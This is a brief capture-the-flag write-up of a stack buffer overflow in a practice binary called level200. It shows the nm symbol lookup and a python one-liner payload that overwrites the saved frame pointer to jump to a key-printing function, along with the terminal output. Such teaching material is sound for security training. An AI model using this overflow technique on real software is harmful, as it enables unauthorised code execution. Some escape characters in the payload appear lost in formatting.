This binary is vulnerable to a buffer overflow in the strncpy function called in the main function with user supplied input. It takes in two arguments, argument 1 being the offset of the address on the stack of the value to copy data from, and argument 2 being the number of bytes to copy. The size of the buffer being copied to is a maximum of 280 bytes. Since the binary has a function containing a call to system(“cat key.txt”), we may simply replace the saved frame pointer with the function address.
[email protected]:~/cscamp/exp200$ nm level200 0000000000600e40 d _DYNAMIC ... 0000000000400654 T cat_key ... 0000000000400669 T main ... U [email protected]@GLIBC_2.2.5
Our address is 0x0000000000400654. We may craft the exploit now, knowing the offset of the saved frame pointer (%RSP+280), and the address of our cat_key. We simply need to copy more than 288 bytes (we choose 300 arbitrarily) from the 3rd argument offset in the stack, i.e. our third argument we pass.
[email protected]:~/cscamp/exp200$ ./level200 3 300 `python -c 'print "A"*280 + "x54x06x40x00x00x00x00x00"'` You entred : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[email protected] cat: ./key.txt: No such file or directory Segmentation fault [email protected]:~/cscamp/exp200$